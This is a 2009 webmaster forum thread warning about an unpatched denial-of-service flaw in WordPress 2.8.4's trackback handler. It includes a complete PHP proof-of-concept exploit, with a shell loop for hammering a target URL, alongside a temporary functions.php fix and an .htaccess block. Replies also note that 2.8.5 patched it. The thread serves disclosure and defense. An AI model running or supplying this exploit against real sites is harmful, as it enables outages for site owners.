GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   wordpress security: *must read* exploit not fixed in 2.8.4 (https://gfy.com/showthread.php?t=934296)

fris 10-20-2009 08:45 AM
wordpress security: *must read* exploit not fixed in 2.8.4
 
Theirs currently an exploit out for 2.8.4 which isnt patched, that will allow someone to exhause your site using a DoS against certain file(s).

Here is the POC (proof of concept)

Code:
<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * [email protected] contacted and get a response,
 * but no solution available.
 *
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <[email protected]>
 *
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 *
 */
if(count($argv) < 2)
    die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
        if(!$fp)
        die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
        echo "hit!\n";
    }
}
?>
and Here is the *temp* fix until they patch it

add this to your themes functions.php file

Code:
<?php

// WP Trackback Temp Fix

function ft_stop_trackback_dos_attacks(){
        global $pagenow;
        if ( 'wp-trackback.php' == $pagenow ){
                // DoS attack fix.
                if ( isset($_POST['charset']) ){
                        $charset = $_POST['charset'];
                        if ( strlen($charset) > 50 ) {  die; }
                }
        }
}
add_action('init','ft_stop_trackback_dos_attacks');

?>

Lace 10-20-2009 08:59 AM
Damn, just went and updated all of my sites recently too.

Thanks, Fris.

Cutty 10-20-2009 09:08 AM
Thanks mate, cheerio.

Ginn 10-20-2009 09:10 AM
Thanks for the info. I'll update everything now.

greg80 10-20-2009 09:40 AM
what are you upgrading to? He said exploit still exists in 2.8.4 (current version)

greg80 10-20-2009 09:40 AM
Quote:
Originally Posted by greg80 (Post 16447546)
what are you upgrading to? He said exploit still exists in 2.8.4 (current version)
edit: ok, I read it again. Thanks fris.

Cyber Fucker 10-20-2009 09:46 AM
Thx for the info!

TheDA 10-20-2009 09:59 AM
Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

Can the default functions.php just be copied over to the theme folder? What else needs to be done?

CYF 10-20-2009 10:02 AM
bumping up some good info, thanks fris

Stephen 10-20-2009 10:58 AM
Quote:
Originally Posted by CYF (Post 16447643)
bumping up some good info, thanks fris
ditto and thanks :thumbsup

skinnay 10-20-2009 11:07 AM
this is no where near the risk of the vulnerability that was recently patched by wordpress.

fris 10-20-2009 01:11 PM
Quote:
Originally Posted by TheDA (Post 16447629)
Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

Can the default functions.php just be copied over to the theme folder? What else needs to be done?
its currently in the 2.8.4 core, it hasnt been updated yet.

You can add that code to your themes functions.php file which overrides any core functions that you have applied in functions.php

Nicky 10-20-2009 01:19 PM
Thanks man, updating the most important one snow, will wait for new release for the smaller blogs.

TheSenator 10-20-2009 01:43 PM
Shit....this may help some people...Its a plugin

http://fullthrottledevelopment.com/w...ck-dos-attacks


I turned off my trackbacks years ago but I think it is still there to exploit.

TheDA 10-20-2009 03:22 PM
Quote:
Originally Posted by fris (Post 16448392)
its currently in the 2.8.4 core, it hasnt been updated yet.

You can add that code to your themes functions.php file which overrides any core functions that you have applied in functions.php
What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

I don't need to do anything else to call the functions.php or anything from any other files?

Big E 10-20-2009 03:24 PM
If you have pingbacks/trackbacks turned off, can you just dev/null it via .htaccess?

<Files wp-trackback.php>
Order Deny,Allow
Deny from all
</Files>

fris 10-20-2009 03:39 PM
Quote:
Originally Posted by TheDA (Post 16449009)
What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

I don't need to do anything else to call the functions.php or anything from any other files?
yes you can add it to file called functions.php if you dont have one currently

TheDA 10-20-2009 03:50 PM
Quote:
Originally Posted by fris (Post 16449071)
yes you can add it to file called functions.php if you dont have one currently
Okay, thanks.

digifan 10-20-2009 03:54 PM
Awesome, thanks guys!

fatfoo 10-20-2009 03:59 PM
Exploit not fixed? Thanks for posting. Interesting read.

d-null 10-20-2009 04:10 PM
thanks for the info...


fuck wordpress is a pain in the ass

digitaldivas 10-20-2009 04:12 PM
...good looking out Fris

Argos88 10-20-2009 05:04 PM
the exploit is FIXED..

the problem you are referring to has to do with some permissions that a user can set. the problem you are referring to, can be more possible on mu if the admin doesn't know how to configure it.

If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.

18teens 10-20-2009 05:42 PM
Thanks for the info.

fris 10-20-2009 06:34 PM
Quote:
Originally Posted by Argos88 (Post 16449342)
the exploit is FIXED..

the problem you are referring to has to do with some permissions that a user can set. the problem you are referring to, can be more possible on mu if the admin doesn't know how to configure it.

If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.
this actually hasnt been fixed, i asked one of the core wordpress developers in a chat this morning, their is a fix if you edit a certain file, but if you download 2.8.4 from the site, the issue is not fixed.

fris 10-20-2009 06:35 PM
nevermind 2.8.5 has been released with the fix

d-null 10-20-2009 08:13 PM
Quote:
Originally Posted by fris (Post 16449509)
nevermind 2.8.5 has been released with the fix
I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so :1orglaugh

TheSenator 10-20-2009 08:34 PM
Quote:
Originally Posted by d-null (Post 16449724)
I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so :1orglaugh
Well, I rather keeping upgrading then lose a day worth work fixing exploits. I have too much money invested in my WordPress blogs.

TheDA 10-21-2009 07:46 AM
Quote:
Originally Posted by fris (Post 16449509)
nevermind 2.8.5 has been released with the fix
Let's see what this version brings :)


All times are GMT -7. The time now is 04:26 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123